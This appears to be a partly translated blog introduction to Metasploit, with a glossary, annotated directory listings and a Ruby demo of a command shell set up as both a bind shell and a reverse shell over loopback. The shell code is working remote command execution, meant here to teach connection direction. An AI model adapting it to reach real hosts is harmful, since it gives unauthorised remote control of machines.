- Pure translation work really isn't necessary; this blogger won't go to the trouble of translating again. We are all adults and time is precious, heh. The parts of this article that are easy to understand were not translated; the parts that are harder to follow the blogger has described in Chinese.
About Metasploit
Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. The platform includes the Metasploit Framework and its commercial counterparts: Metasploit Pro, Express, Community, and Nexpose Ultimate.
The Metasploit Framework
- Open-source project: https://github.com/rapid7/metasploit-framework/
- Project wiki: https://github.com/rapid7/metasploit-framework/wiki
Metasploit Pro and the other commercial editions
Most of the additional features are targeted towards automating and streamlining common pentest tasks, such as vulnerability validation, social engineering, custom payload generation, and bruteforce attacks.
Metasploit components
Modules
Module types include: exploit, auxiliary, payload, NOP generator, encoder, and post-exploitation.
Services
- PostgreSQL runs the database service that stores Metasploit project data (hosts, services, credentials, loot).
- Ruby on Rails runs the web version of the Metasploit interface.
- Pro service, or the Metasploit service bootstraps Rails, the Metasploit Framework, and the Metasploit RPC server.
Web Interface
A web interface is available for you to work with Metasploit Pro. To launch the web interface, open a web browser and go to https://localhost:3790.
Glossary of terms
- Auxiliary module: a module that does not execute a payload. Auxiliary modules include scanners, fuzzers, and denial-of-service attacks.
- Bind shell payload: a shell that attaches a listener on the exploited system and waits for a connection to that listener.
- Discovery scan: a Metasploit scan that combines Nmap and several Metasploit modules to enumerate and fingerprint targets.
- Exploit: a program that takes advantage of a specific vulnerability to give the attacker access to the target system. For example, one of the most common exploits is MS08-067, which targets a Windows Server Service vulnerability that could allow remote code execution.
- Exploit module: a module that runs an exploit and, on success, creates a session. Exploit modules include buffer overflow, code injection, and web application exploits.
- Meterpreter: an advanced, multi-function payload that provides you with a command shell. Through the Meterpreter shell you can do many things, such as download files, dump account password hashes, and pivot into other networks. Meterpreter runs in memory and writes nothing to disk, which is why many intrusion detection systems miss it, though modern endpoint detection does look for it in memory.
- Payload: the code that runs on the target system after a successful exploit. The payload defines how the shell connects and what you can do once you control the target. A payload can be a reverse shell or a bind shell; the difference between the two is the direction of the connection. With a reverse shell the target initiates the connection to the attacker's machine, while with a bind shell the attacker's machine connects to the target. Reverse shells are the usual choice because the outbound connection passes through NAT and inbound-only firewalls.
- Post-exploitation module: a module that gathers more information, or provides further access, on an already-exploited system, for example hash dumps and application and service enumeration.
- Shellcode: the set of machine instructions that an exploit delivers as its payload.
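As an added example (not code from this page or from Metasploit itself), the following Ruby wires the same minimal command loop up in both directions over loopback, so the only thing that changes between a bind shell and a reverse shell is which side calls accept and which side calls connect. The loopback addresses, the ephemeral ports and the use of echo as the test command are assumptions for the demo.

```ruby
require 'socket'
require 'open3'

# Added demo, not Metasploit code. A minimal command shell wired up in both
# directions over loopback. Loopback addressing, ephemeral ports and the
# commands sent are assumptions for this demo; do not leave this listening.

EOM = "\x00".freeze # marks the end of one command's output on the wire

# Implant side: read one command per line, run it, send the output back.
# This loop is the same for a bind shell and a reverse shell; only the way
# `sock` was obtained differs, which is exactly what Metasploit's bind_tcp
# and reverse_tcp stagers abstract away from the payload stage.
def implant_loop(sock)
  while (line = sock.gets)
    cmd = line.chomp
    break if cmd == 'exit'
    out, _status = Open3.capture2e(cmd) # run the command, capture stdout+stderr
    sock.write(out + EOM)
  end
ensure
  sock.close
end

# Operator side: send one command, read until the end-of-message marker.
def run_remote(sock, cmd)
  sock.puts(cmd)
  sock.gets(EOM).to_s.chomp(EOM)
end

# Drive one session: run a command, then tell the implant to exit.
def drive(attacker_sock, implant_thread, cmd)
  result = run_remote(attacker_sock, cmd)
  attacker_sock.puts('exit')
  attacker_sock.close
  implant_thread.join
  result
end

# Bind shell: the target listens, the attacker connects in. Only works when
# the attacker can reach the target's port (no NAT or inbound filtering).
def bind_shell_demo(cmd)
  listener = TCPServer.new('127.0.0.1', 0)          # target opens a port
  port     = listener.addr[1]
  implant  = Thread.new { implant_loop(listener.accept) }
  attacker = TCPSocket.new('127.0.0.1', port)       # attacker dials in
  drive(attacker, implant, cmd)
ensure
  listener&.close
end

# Reverse shell: the attacker listens (LHOST/LPORT), the target calls out.
# Survives NAT and inbound-only firewalls because the target initiates the
# connection, which is why reverse payloads are the usual default.
def reverse_shell_demo(cmd)
  listener = TCPServer.new('127.0.0.1', 0)          # attacker's handler
  port     = listener.addr[1]
  implant  = Thread.new { implant_loop(TCPSocket.new('127.0.0.1', port)) } # target dials out
  attacker = listener.accept
  drive(attacker, implant, cmd)
ensure
  listener&.close
end

if __FILE__ == $PROGRAM_NAME
  puts bind_shell_demo('echo bind-ok')
  puts reverse_shell_demo('echo reverse-ok')
end
```

Note that `implant_loop` never knows which direction it was reached from; in Metasploit the same split lets a single Meterpreter stage be delivered by either a `bind_tcp` or a `reverse_tcp` stager, with `exploit/multi/handler` playing the listener role on the attacker side for reverse payloads.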
MSF directory layout
root@kali:/usr/share/metasploit-framework# tree -L 2 --sort=version -r -d
.
├── vendor
│ └── bundle
├── tools #extra small utilities and third-party helper scripts
│ ├── recon
│ ├── password
│ ├── modules
│ ├── memdump
│ ├── hardware
│ ├── exploit
│ ├── dev
│ └── context
├── scripts #legacy Meterpreter and resource scripts; run from a session with `run <name>` (no post/ prefix or absolute path), unlike the post modules under modules/post, which are now the preferred form
│ ├── shell
│ ├── resource
│ ├── ps
│ └── meterpreter
├── plugins #msfconsole plugins, loaded with `load <name>`
├── modules #the framework's own modules, one directory per module type
│ ├── post #post-exploitation modules
│ ├── payloads #payload modules (singles, stagers, stages)
│ ├── nops #NOP generator modules
│ ├── exploits #exploit modules
│ ├── encoders #encoder modules
│ └── auxiliary #auxiliary modules
├── lib #framework core library (msf, rex) and bundled third-party libraries
│ ├── telephony
│ ├── tasks
│ ├── sqlmap
│ ├── snmp
│ ├── rex
│ ├── rbmysql
│ ├── rabal
│ ├── postgres
│ ├── net
│ ├── msf
│ ├── metasploit
│ ├── metasm
│ └── anemone
├── documentation -> ../doc/metasploit-framework
├── db #Rails database migrations that build the framework's PostgreSQL schema
│ └── migrate
├── data #data files: post-exploitation helper binaries and payload stubs, third-party tools, wordlists, templates
│ ├── wordlists
│ ├── wmap
│ ├── webcam
│ ├── templates
│ ├── sounds
│ ├── snmp
│ ├── post
│ ├── php
│ ├── passivex
│ ├── msfcrawler
│ ├── meterpreter
│ ├── markdown_doc
│ ├── logos
│ ├── lab
│ ├── ipwn
│ ├── flash_detector
│ ├── exploits
│ ├── cpuinfo
│ └── SqlClrPayload
├── config #framework configuration, including the database settings (database.yml)
│ └── environments
└── app
├── validators
└── concerns
66 directories
root@kali:/usr/share/metasploit-framework# tree -L 1 --sort=version -r -p | grep '\[-'
├── [-rwxr-xr-x] ruby
├── [-rwxr-xr-x] msfvenom #payload generator and encoder; merges the functions of msfpayload and msfencode, which it replaced (both have been removed from the framework)
├── [-rwxr-xr-x] msfupdate #updates the framework from git; on Kali it only tells you to use apt instead
├── [-rwxr-xr-x] msfrpcd #persistent RPC daemon that exposes the framework to remote clients over MessagePack-RPC on HTTP/HTTPS
├── [-rwxr-xr-x] msfrpc #command-line client for msfrpcd
├── [-rwxr-xr-x] msfdb #initialises, starts and stops the PostgreSQL database the framework uses
├── [-rwxr-xr-x] msfd #daemon that serves an msfconsole over a TCP socket so several clients can share one framework instance
├── [-rwxr-xr-x] msfconsole #the main interactive console, which ties all of the above together
├── [-rw-r--r--] metasploit-framework.gemspec
├── [-rwxr-xr-x] Rakefile
├── [-rw-r--r--] Gemfile.lock
└── [-rwxr-xr-x] Gemfile